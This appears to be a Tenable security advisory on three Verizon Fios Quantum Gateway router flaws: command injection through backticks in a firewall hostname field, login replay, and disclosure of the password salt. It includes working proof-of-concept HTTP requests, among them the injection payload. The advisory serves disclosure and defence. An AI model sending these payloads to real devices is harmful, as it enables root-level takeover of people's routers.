Verizon Fios Quantum Gateway Multiple Vulnerabilities

Tenable has discovered multiple vulnerabilities in the Verizon Fios Quantum Gateway.

CVE-2019-3914: Authenticated Command Injection

A command injection vulnerability was discovered in the API backend. This vulnerability can be exploited remotely to achieve command execution with root privileges. An attacker must be authenticated to the device's administrative web application in order to perform the command injection.

This issue exists due to the way firewall access control rules are processed. Specifically, the vulnerability can be triggered by adding an access control rule for a network object with a crafted host name.

For example, if a network object is added with a hostname of "`whoami`" (note the backticks), and this object is used in a firewall access control rule, the 'whoami' command will be executed.

Below is a log entry in /chroot/mnt/log/user. Notice that `whoami` is incorporated into the iptables command.

user.err11> bhr4: Firewall.AccessControlRulesLog: Failed to delete rules: iptables -A AC_B_1_NWOBJ_1 -s `whoami` -j AC_B_1_SERVICES

Below is a proof of concept HTTP request. Note that the results of the command will not be returned. Please note that it is possible to obtain a root shell.

POST /api/firewall/accesscontrol HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.11.1
X-XSRF-TOKEN: 1eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89
Cookie: Session=944817705; XSRF-TOKEN=1eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89
Content-Length: 373
Content-Type: application/json
 
{"blockRule": true, "schedule": "", "networkObjects": [{"rules": [{"hostname": "`whoami`", "networkObjType": 4}], "type": 3, "name": "Scooby"}], "enabled": true, "hosts": [], "schedule1": {}, "services": []}



CVE-2019-3915: Login Replay

The login process is susceptible to replay. Given that HTTP is not enforced, an attacker could intercept a login request and subsequently replay it to gain access to the router's administrative web interface.

When a user attempts to log in, a salted SHA-512 password hash is POSTed. This is all the attacker needs to log in. For instance, a login request looks like such:

POST /api/login HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/
Content-Type: application/json;charset=utf-8
Content-Length: 143
Connection: close
Cookie: test
 
{"password":"5e619e19824b1072f89ff309e3896b1b6dd31aebfab1698b2662d97352d9da9fbdbf7c165239a2214bdf9ae512821e78875a1b515bd4140ec919dda201f1001e"}



CVE-2019-3916: Password Salt Information Disclosure

An unauthenticated attacker is able to retrieve the value of the password salt by simply visiting a URL in a web browser. Given that the firmware does not enforce the use of HTTPS, it is feasible for an attacker to capture (sniff) a login request. The login request contains a salted password hash (SHA-512), so the attacker could then perform an offline dictionary attack to recover the original password.

A proof of concept is below showing an HTTP request/response pair. Notice that the 'passwordSalt' is returned.

GET /api HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: test; bhr4UI2HasToRefresh=false; bhr4HasEnteredAdvanced=true; Session=; XSRF-TOKEN=

HTTP/1.1 401 Unauthorized
Cache-Control: no-cache
Content-Type: application/json; charset=utf-8
Content-Length: 173
Date: Thu, 06 Dec 2018 13:00:40 GMT
Server: lighttpd/1.4.38
 
{"doSetupWizard":false,"requirePassword":true,"passwordSalt":"6299bfce-1d56-4a6c-9bd8-352dc9ce865c","isWireless":false,"error":1,"maxUsers":10,"denyState":0,"denyTimeout":0}